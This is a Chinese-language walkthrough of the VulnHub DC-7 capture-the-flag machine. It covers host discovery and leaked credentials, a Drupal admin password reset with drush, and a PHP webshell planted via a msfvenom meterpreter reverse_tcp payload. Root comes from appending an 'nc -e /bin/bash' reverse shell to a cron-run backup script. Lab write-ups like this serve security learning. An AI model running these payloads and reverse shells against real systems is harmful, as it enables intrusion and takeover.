介绍
系列: DC(此系列共10台)
发布日期:2019年8月31日
难度:中级
Flag:获取root权限,并拿到唯一的flag
学习:
- drupal安装php实现挂马
- 提权
靶机地址:https://www.vulnhub.com/entry/dc-7,356/
从靶场得到提示信息:
- 靶机更适用Virtualbox
- 不要尝试爆破,很难成功
信息收集
主机发现
netdiscover主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。
netdiscover -i eth0 -r 192.168.1.0/24
主机信息探测
信息探测:nmap -A -p- 192.168.1.125,只开放了22和80端口
访问网站
得知网站是 drupal 站点,网站首页的提示信息就是不建议我们爆破网站。
目录扫描没有发现任何有价值的信息,唯一有点意思的是左下角的“@DC7USER”,不知道是个啥玩意,丢谷歌上搜一下,发现了一个推特账号
得到一个github地址
经核对,这个github地址就是跟谷歌的第一个搜索结果是一个地址,然后就看到了账号:dc7user、密码:MdR3xOgB7#dW
尝试登录网站失败
额,那就只能尝试ssh连接了。然后就连接上了。
SSH登录
信息收集
唯一引人注目的就是mbox文件。直接查看乱糟糟的,使用mail -f mbox得知邮件共有9封,是以root身份定时运行/opt/scripts/backups.sh脚本得到的。靶场还没有sudo,那就来看看这个脚本是个什么东东吧。
得到的信息还挺多的
分析:
- 由于此脚本执行的是root权限,所以我们现在只要在脚本里写入反弹shell命令就能得到root权限的shell了
- www-data用户具有对该脚本写入的权限,所以我们拿到www-data用户的反弹shell就是root权限的shell
- drush命令是drupal系统中特定的管理工具。可以修改www-data用户admin密码
修改web后台密码
修改admin用户密码为admin:drush user-password admin --password="admin"
登录成功
挂马
没有找到可以挂马的地方,看了下别人的文章,真是涨了些见识,原来可以安装php来挂马
- 发现没有写入php的页面
- 安装php
搜索php定位位置,勾选它,并点击安装
- 开始挂马
由于webshell管理工具的字体大小、背景颜色不便于截图展示,所以我这里还是用msf来做吧。
生成后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.118 LPORT=4444 x> shell.php
开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.118
exploit
- 投放木马
- getshell
提权
反弹shell:echo 'nc -e /bin/bash 192.168.1.118 4444' >> /opt/scripts/backups.sh
kali开启监听:nc -nvlp 4444
由于脚本是每个15分钟运行一次,坐等15分钟吧
- 确认命令写入成功
- 听会歌,然后看到建立了nc连接
